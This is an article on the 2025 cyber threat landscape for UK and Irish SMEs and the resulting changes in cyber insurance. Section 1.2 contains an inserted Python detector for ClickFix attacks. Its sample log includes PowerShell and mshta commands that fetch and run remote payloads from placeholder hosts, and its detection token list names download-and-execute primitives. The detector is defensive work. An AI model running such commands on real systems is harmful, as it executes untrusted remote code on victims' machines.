
Adapting to the new normal: A reflection on what 2025’s cyber threats mean for SME risk, regulation and insurance

Across the UK and Ireland, small and medium-sized enterprises (SMEs) have spent 2025 navigating an increasingly volatile cyber threat landscape. The realities of modern cyber risk, including ransomware outages, supply chain failures, data theft and AI-enabled fraud, have moved far beyond theoretical risk registers. For many SMEs, cyber incidents have had measurable, sometimes severe, financial, operational and legal impacts.

Simultaneously, the cyber insurance market serving SMEs has undergone meaningful change. Insurers have tightened underwriting requirements, expanded expectations around controls, adapted to emerging AI-driven threats, and increasingly shaped the resilience behaviours of insured organisations. Recent data from the Association of British Insurers revealed that nearly £200 million was paid out in cyber claims in 2024, a 230% increase year on year, illustrating the growing demand for this type of policy.

In this article, we reflect on how SMEs have been impacted this year and what these developments mean for insurers, legal advisers and business leaders.


1. The cyber threat landscape for SMEs in 2025

1.1 Ransomware and data exfiltration dominate SME losses

Ransomware continued to be the single most consequential threat for SMEs across 2025. Allianz reports that ransomware accounted for around 60% of the value of large cyber claims in 1H 2025, with attackers increasingly focusing on mid-sized and less well-protected firms as large enterprises hardened their defences.1

A critical shift this year has been attackers’ reliance on data exfiltration, now easier and faster than encryption. Allianz notes that 40% of all high-value claims in 1H 2025 involved data theft, up from 25% the previous year. 

For small businesses handling sensitive customer, employee or financial information, particularly in the professional services, legal, retail and hospitality sectors, this has meant elevated regulatory and legal exposure. The recent Hiscox report underlines the point: 33% of compromised businesses reported a regulatory fine following a data breach that was substantial enough to impact business health.3

Small business owners need to be aware that the consequences of a cyber incident are no longer limited to incident response costs; they now extend to compliance failures, regulatory scrutiny and customer litigation. Cybercrime now represents a real balance-sheet risk to all organisations, irrespective of size or turnover.

1.2 Phishing, social engineering and credential theft as primary entry points

ENISA’s analysis confirms that phishing remains the single largest initial intrusion vector, accounting for 60% of analysed cases from mid-2024 to mid-2025.2 Identity-based attacks are now the dominant mode of cyber intrusion. As Allianz notes, 80% of attacks in the past year were malware-free, relying instead on compromised credentials, impersonation and social engineering to gain initial access, a dramatic increase from 40% in 2019.1

For many small businesses, where security budgets are often limited and staff turnover can be high, this shift represents a disproportionate risk: people remain the easiest entry point.

Importantly, phishing attacks have evolved significantly, making them harder to identify. 2025 has showcased many new techniques used by bad actors, including:

  • “ClickFix-style” scams, where users are tricked into pasting and executing PowerShell commands presented by fake CAPTCHA or “fix this error” overlays.
  • “Quishing” (QR-code phishing), increasingly used to bypass email filtering because the malicious link sits inside an image rather than in scannable link text.
  • “Phishing-as-a-Service” platforms allowing low-skill actors to deploy credible brand-spoofing kits at scale.
  • Mobile-delivered phishing campaigns, sent via iMessage, RCS and messaging apps.
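The ClickFix pattern above leaves a consistent trace on the endpoint: an interpreter (PowerShell, mshta, cmd) spawned by the user’s shell, with a command line that fetches and runs a remote payload. The Python below is an added example for this article, not code from the original text or from any of the cited reports. It scores constructed process-creation events against that pattern; the simplified Sysmon/4688-style “ParentImage= Image= CommandLine=” log format, the example.invalid URLs, the token list and the alert threshold are all assumptions chosen for illustration.

```python
"""
Added example: heuristic triage of process-creation events for ClickFix-style
execution. In a ClickFix lure the victim pastes an attacker-supplied command
into the Win+R Run dialog, so the interpreter (powershell.exe, mshta.exe,
cmd.exe) is spawned by explorer.exe with a command line that downloads and
executes a remote payload. The log format and every event below are constructed.
"""
import re
from dataclasses import dataclass

# Constructed events in an assumed, simplified rendering of a process-creation
# log (ParentImage=<path> Image=<path> CommandLine=<rest of line>).
SAMPLE_LOG = r"""
ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -w hidden -c "iex (irm https://example.invalid/verify.txt)"
ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\mshta.exe CommandLine=mshta https://example.invalid/captcha.hta
ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -NoProfile -File C:\Scripts\backup.ps1
ParentImage=C:\Windows\System32\svchost.exe Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine=powershell -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\Patch\update.ps1
""".strip()


@dataclass(frozen=True)
class ProcessEvent:
    parent: str        # basename of the parent image, lower-case
    image: str         # basename of the spawned image, lower-case
    command_line: str


# Interpreters a pasted Run-dialog command typically lands in.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Download-and-execute primitives and evasion switches seen in ClickFix lures
# (illustrative list; extend from your own incident data).
SUSPICIOUS_TOKENS = [
    r"\biex\b", r"invoke-expression",
    r"\birm\b", r"invoke-restmethod",
    r"\biwr\b", r"invoke-webrequest", r"downloadstring",
    r"-w(indowstyle)?\s+h(idden)?",                    # hide the console window
    r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",  # base64-encoded script
    r"https?://[^\s'\"]+",                             # any remote URL
]

_line_re = re.compile(r"^ParentImage=(\S+)\s+Image=(\S+)\s+CommandLine=(.*)$")
_token_re = re.compile("|".join(SUSPICIOUS_TOKENS), re.IGNORECASE)

THRESHOLD = 3  # illustrative; tune against a baseline of benign admin activity


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> ProcessEvent:
    m = _line_re.match(line)
    if not m:
        raise ValueError(f"unrecognised event line: {line!r}")
    return ProcessEvent(_basename(m.group(1)), _basename(m.group(2)), m.group(3))


def suspicious_tokens(command_line: str) -> set[str]:
    """Distinct suspicious fragments present in the command line."""
    return {m.group(0).lower() for m in _token_re.finditer(command_line)}


def score_event(ev: ProcessEvent) -> int:
    score = 0
    if ev.parent == "explorer.exe":   # launched from the shell (Run dialog), not a service or task
        score += 1
    if ev.image in LOLBINS:
        score += 1
    score += len(suspicious_tokens(ev.command_line))
    return score


def is_suspicious(ev: ProcessEvent) -> bool:
    return ev.image in LOLBINS and score_event(ev) >= THRESHOLD


def detect(events) -> list[ProcessEvent]:
    return [ev for ev in events if is_suspicious(ev)]


if __name__ == "__main__":
    events = [parse_event(line) for line in SAMPLE_LOG.splitlines()]
    for ev in events:
        flag = "ALERT" if is_suspicious(ev) else "ok   "
        print(f"{flag} score={score_event(ev)} {ev.parent} -> {ev.image}: {ev.command_line[:70]}")
```

The explorer.exe parent is the strongest single signal here: legitimate PowerShell automation is normally launched by a scheduler, management agent or installer, not by a user typing into the Run dialog. On a live host the same paste also leaves a forensic trace in the user’s RunMRU registry key, which is worth collecting alongside process events when investigating a suspected ClickFix victim.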


1.3 SME exposure through supply chain and digital dependencies

Cyber risk within the supply chain has escalated sharply. Allianz reports a rise in contingent business interruption (CBI) claims, which accounted for 15% of major cyber claim value in 2025, up from 6% in 2024.1 Supply chain attacks demonstrate how third-party failures can quickly become operational, regulatory and reputational issues for everyone involved. ENISA gives a number of examples that illustrate the risk vividly, showing how supplier-led cyber incidents can have immediate consequences for organisations that were not the original target: breaches at IT service providers disrupted ticketing systems for transport operators in Italy, while the compromise of a technology provider exposed customer data belonging to the Spanish energy firm Repsol.2

ENISA also highlights a growing pattern of attacks exploiting outdated or compromised open-source libraries, browser extensions and SaaS applications. These technologies are deeply embedded across modern business systems but often sit outside the direct control or visibility of SMEs, leaving organisations exposed to inherited supply-chain risk.2

For SMEs increasingly reliant on managed services, cloud platforms, and third-party software, the traditional perimeter has dissolved. Risk now extends across every digital dependency, many of which SMEs lack visibility or governance over.

1.4 The impact of AI-enabled threats

By 2025, generative AI had moved decisively from novelty to norm. What began as experimentation with chatbots and content tools quickly became embedded across everyday business operations, from drafting emails and analysing data to automating customer support and supporting decision-making. Industry research shows that a majority of organisations now use generative AI in at least one core function, driven by rapid productivity gains, falling barriers to entry, and widespread integration into familiar platforms such as office suites and cloud services. The same adoption curve has been replicated within the cybercrime world.

Hiscox identifies AI-driven phishing, AI malware and AI-powered social engineering as the top emerging threats SMEs expect over the next five years, with 60% expressing concern about their ability to identify AI-generated attacks.3 ENISA reports that 80% of observed social engineering globally now uses AI to enhance believability, scale and personalisation, with generative AI increasingly used to automate phishing, deepfake voice calls (vishing) and reconnaissance.2

The NCSC warns that attackers are leveraging AI to, “accelerate vulnerability discovery, tailor messaging at individual employees, distribute convincing deepfake impersonations, and script malware variations that evade detection”.4

AI is not merely amplifying attacks; it is democratising them.

2. How SMEs have responded: Progress and persistent gaps

2.1 Investment and improvements in cyber maturity

Despite the severity of attacks, SMEs have shown notable improvements in cyber readiness, driven largely by national schemes such as the NCSC’s Cyber Essentials. According to Hiscox, 88% of small business owners perform supplier risk assessments and 91% conduct quarterly vulnerability checks; 83% of SMEs report improved cyber resilience compared to the previous year, and 94% plan to increase cybersecurity investment.3

This improvement can also be tracked within the insurance sector. Allianz notes that insured firms have become significantly more resilient than uninsured ones, with insurance-driven controls contributing to an increase in cyber loss impact around 70% lower than the wider economy’s 250% rise in cybercrime cost over the same period.1

2.2 Weak points remain: People and process

The NCSC emphasises that too many businesses still regard cyber as an IT problem rather than a governance issue, despite its clear financial and legal implications.4

Many small businesses still lack basic security controls, including enforced MFA, segmented networks and tested backups. Staff remain the primary vulnerability, exploited in 60% of breaches (Verizon, cited by Allianz).1 Despite repeated calls from security experts for businesses to adopt a ‘cyber resilience’ posture, focused on the ability to respond to and recover from a cyber-attack, many businesses still lack incident response and business continuity plans.

Even businesses with good controls struggle with response coordination. The Co-op CEO’s open letter in the NCSC Annual Review, following the retailer’s high-profile 2025 attack, highlights the profound operational strain of incident management regardless of preparation, a lesson especially relevant for SME leaders with limited internal resources.4

3. How the cyber insurance market for SMEs has changed in 2025

3.1 Tougher underwriting and rising expectations

In 2025, SME cyber insurance in the UK and Ireland has shifted from a “nice to have” to a more tightly underwritten risk-transfer product: insurers are paying more claims, but they are also asking harder questions. The need for cyber risk transfer is accelerating board-level attention on cyber insurance and renewal scrutiny for SMEs, especially around ransomware and business interruption. Underwriting increasingly hinges on demonstrable controls (e.g. MFA, backups, incident response), while claim drivers such as BEC and social engineering remain prominent.5

This is also reflected in the Allianz report which documents that basic controls such as MFA, network segmentation, and patching could have prevented over 80% of large claims in 2025, directly influencing underwriting expectations for SMEs seeking coverage.1

Despite the overall cyber insurance market softening, 2025 has shown that insurers are increasingly unwilling to cover firms that cannot evidence minimum hygiene.

3.2 The impact of non-attack losses on the market

A notable 2025 trend has been the rise of non-attack incidents, following on from 2024, when 28% of large cyber claims were driven not by attacks but by privacy litigation, technical outages and regulatory actions.

2025 saw the first major claims linked to technology failure rather than attack, including those arising from the global outage caused by a faulty CrowdStrike Falcon sensor update.1 Cloudflare’s November 2025 outage caused similar downtime, although claims from it are yet to materialise.6 For insurers, this broadens the loss profile well beyond ransomware, requiring revised pricing models and potentially reshaped cover.

3.3 Regulatory pressure and mandatory disclosure discussions

While paying a ransom has traditionally been frowned upon by security professionals and law enforcement, in specific circumstances compromised business owners are left with very few alternatives to recover their business and data. Historically, cover for ransomware payments has been a feature of some cyber insurance policies. However, there have been notable changes within the sector. Hiscox reports that 71% of SMEs globally support mandatory disclosure of ransomware payments, signalling a change in the regulatory landscape.3

In some jurisdictions, governments now enforce mandatory reporting; Australia, for example, introduced mandatory reporting of ransomware payments under its Cyber Security Act 2024.3

Within Europe, the GDPR enforcement trajectory continues to shape insurer exposure. Rising privacy litigation and fines, which accounted for 18% of major claim value in 2024, have directly influenced underwriting, pricing, and coverage limits.1 Insurers increasingly expect SMEs to demonstrate compliance maturity through evidence, not self-assessment. This is one area where we expect to see significant changes in risk disclosure in the coming years.

4. The Road Ahead for SMEs: Forecast for cyber insurance in 2026

The SME cyber insurance market will continue to develop in response to the behaviour of cyber criminals as we progress through 2026. In particular, we predict:

4.1 Cyber insurance pricing will become behaviour-based, not size-based

By 2026, SME cyber insurance premiums will be driven far more by demonstrated cyber behaviours than by turnover, headcount or sector alone. Insurers have learned in 2024–2025 that basic controls matter more than firm size.

What this means:
Two SMEs of the same size will face materially different premiums, excesses and coverage terms based on how well they manage cyber risk in practice, not how they describe it at proposal stage.

4.2 “Insurability gaps” will emerge for poorly governed SMEs

While the overall cyber insurance market may continue to soften, 2026 will expose a growing coverage gap for SMEs that fail to meet minimum cyber hygiene standards. Insurers are already signalling reluctance to cover firms unable to evidence controls, and this trend will harden.

Regulators and threat analysts including NCSC have repeatedly stressed that cyber risk is a governance issue, not an IT problem. Insurers will align with this view by declining cover, applying exclusions, or imposing punitive excesses where cyber oversight remains informal or undocumented.

What this means:
Cyber insurance will no longer function as a safety net for weak controls. For some SMEs, the risk will shift from “high premium” to “no viable cover available.”

4.3 Regulatory exposure will become a primary claims driver

During 2026, regulatory and legal consequences will rival ransomware as the dominant loss driver for SME cyber insurance. GDPR enforcement, privacy litigation and mandatory disclosure regimes are already reshaping claims profiles. European regulators will continue to expect proof of compliance maturity, not self-attestation.

What this means:
Cyber insurance will increasingly overlap with legal risk management. Where SMEs do not have documented data governance, supplier oversight and incident response arrangements, insurers are more likely to apply higher excesses and restrict the scope of cover.

4.4 Supply-chain risk will be explicitly priced into SME policies

2026 will see insurers formally pricing contingent business interruption (CBI) and third-party dependency into SME cyber policies. The sharp rise in claims linked to MSP outages, SaaS failures and cloud incidents has demonstrated that SMEs inherit risk they cannot directly control.

Insurers will respond by:

  • Requiring visibility of critical suppliers
  • Applying sub-limits to third-party outages
  • Expecting contractual risk transfer and vendor due diligence

What this means:
SMEs relying heavily on managed services, cloud platforms or single-vendor stacks will need to demonstrate resilience planning beyond their own perimeter or face coverage constraints.

4.5 Continuous cyber risk monitoring will replace annual insurance questionnaires

Static proposal forms are no longer compatible with a threat landscape shaped by AI-enabled attacks, credential compromise and rapid environmental change. By the end of 2026, cyber insurers will increasingly rely on continuous or near-real-time risk signals to assess SME exposure. Insurers need fresher data to manage accumulation risk, particularly as AI lowers the barrier to attack.

What this means:
SMEs should expect cyber insurance to feel less like an annual purchase and more like an ongoing risk relationship, where posture, not promises, determines cover quality.


5. Conclusion

2025 has marked a turning point. Cyber threats against SMEs have become more pervasive, more sophisticated, and more deeply entangled with supply chain and regulatory realities. But SMEs have also demonstrated resilience: increased investment, improved controls, and greater engagement with cyber insurance. For business owners, it is important to remember that cyber resilience is a shared responsibility requiring active leadership, continuous investment and coordinated response capability.

The organisations that thrive will be those that treat cyber risk not merely as a compliance function but as a core component of strategic, operational and economic resilience. Those that survive will have the safety net of an adequate cyber insurance policy in their arsenal.

6. Sources

  1. Allianz Commercial, Cyber Security Resilience 2025, Claims & Risk Management Trends, commercial.allianz.com
  2. ENISA, ENISA Threat Landscape 2025, October 2025, enisa.europa.eu
  3. Hiscox, Cyber Readiness Report 2025, September 2025, hiscoxgroup.com
  4. NCSC, National Cyber Security Centre Annual Review 2025, October 2025, ncsc.gov.uk/cybergovernance-for-boards
  5. Travelers, Q2 2025 Cyber Incident Report, September 2025, https://www.travelers.ie/insights/cyber/q2-2025-cyber-threat-report
  6. Cloudflare, November 2025, https://blog.cloudflare.com/18-november-2025-outage/